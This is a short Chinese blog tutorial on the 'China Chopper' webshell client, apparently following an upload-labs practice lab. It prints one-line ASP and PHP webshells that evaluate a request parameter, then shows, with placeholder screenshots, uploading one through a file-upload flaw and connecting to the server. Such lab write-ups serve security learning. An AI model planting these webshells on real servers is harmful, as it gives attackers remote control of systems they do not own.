信息安全

中国菜刀的使用

2018-06-08  本文已影响80人  不吃鱼的猫_de06

菜刀的安装大家在网上随便一搜就很多,这里不再和大家详解,主要是讲解一下菜刀的原理及使用;

1.中国菜刀支持的服务端脚本:PHP、ASP;(常用的脚本就这两种)
2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。
3.菜刀的工作原理是:利用上传到服务器的一句话木马再通过一些添加配置就可以工作了

一句话木马:
Asp: <%eval request("x")%>

php: <?php @eval($_POST['x']);?>

我们就拿上一篇博客upload-labs教程(一)来讲一下:
在上一篇中,我们通过文件长传漏洞成功将我们的一句话木马写入服务器中,这时我们就需要通过菜刀进入到对方的电脑中;
首先,我们先将一句话木马写入事先准备好的zqlone.php中,如图:


1

然后就根据上一篇博客upload-labs教程(一)进行抓包:


2
复制图像地址后进入到该地址,得到图像的路径;
3
然后我们打开菜刀,右键添加:
4

将这些信息填到相应的位置,然后点击添加!!


5

成功进入到对方电脑中!!!

上一篇下一篇

猜你喜欢

热点阅读